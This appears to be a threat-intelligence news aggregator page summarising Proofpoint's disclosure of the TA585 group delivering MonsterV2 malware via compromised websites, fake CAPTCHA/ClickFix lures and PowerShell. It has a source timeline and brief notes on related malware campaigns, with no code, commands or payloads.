MonsterV2 phishing delivery and payload capabilities
Malware Activity
Summary
Hide ▲
Show ▼
TA585 is a newly identified cybercriminal group delivering MonsterV2 through its own phishing and malware infrastructure. Proofpoint says MonsterV2 was first advertised in February 2025, and TA585 uses compromised websites, fake CAPTCHA/ClickFix pages, and PowerShell to push infections. The activity later expanded into a GitHub-themed campaign that abused notifications and fake security alerts, with some attacks also distributing Rhadamanthys.
Related Happenings
Mini Shai-Hulud npm supply-chain malware wave
Malware Activity
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
Mini Shai-Hulud npm supply-chain malware wave
Malware ActivityAbout this happening: The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
Vidar infostealer market rise and distribution expansion
Malware Activity
First: 28.04.2026 22:07
Last: 28.04.2026 22:07
Sources 1
About this happening:
**Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Vidar infostealer market rise and distribution expansion
Malware ActivityAbout this happening: **Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Mirax Android banking trojan with residential proxy nodes
Malware Activity
First: 13.04.2026 17:30
Last: 13.04.2026 17:30
Sources 1
About this happening:
Mirax is spreading across **Europe** with **remote access** and **residential proxy** features, increasing the risk of device compromise, data theft, and traffic abuse. The Androi...
Mirax Android banking trojan with residential proxy nodes
Malware ActivityAbout this happening: Mirax is spreading across **Europe** with **remote access** and **residential proxy** features, increasing the risk of device compromise, data theft, and traffic abuse. The Androi...
OAuth device-code phishing campaign targeting SaaS accounts
Campaign
First: 04.04.2026 17:17
Last: 04.04.2026 17:17
Sources 1
About this happening:
A **device code phishing** campaign now includes **EvilTokens**, a **phishing-as-a-service** kit sold on **Telegram** that uses the **OAuth 2.0 device authorization flow** to hija...
OAuth device-code phishing campaign targeting SaaS accounts
CampaignAbout this happening: A **device code phishing** campaign now includes **EvilTokens**, a **phishing-as-a-service** kit sold on **Telegram** that uses the **OAuth 2.0 device authorization flow** to hija...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware ActivityAbout this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Timeline
-
14.10.2025 08:28 3 articles · 7mo ago
TA585 and MonsterV2 disclosure
Initial DisclosureProofpoint researchers disclosed TA585 as a previously undocumented threat actor using phishing campaigns, web injections, IRS-themed lures, fake CAPTCHA/ClickFix pages, and malicious JavaScript injections to deliver MonsterV2, a malware family also called Aurotun Stealer. The campaign history described in the disclosure includes MonsterV2 being first observed advertised on criminal forums in February 2025, an earlier switch from Lumma Stealer to MonsterV2 in early 2025, and later attack waves in April 2025 that used legitimate websites with fake CAPTCHA overlays and PowerShell-based delivery.
Show sources
- Researchers Expose TA585’s MonsterV2 Malware Capabilities and Attack Chain — thehackernews.com — 14.10.2025 08:28
- Researchers Expose TA585’s MonsterV2 Malware Capabilities and Attack Chain — thehackernews.com — 14.10.2025 08:28
- Hacker Group TA585 Emerges With Advanced Attack Infrastructure — www.infosecurity-magazine.com — 14.10.2025 18:00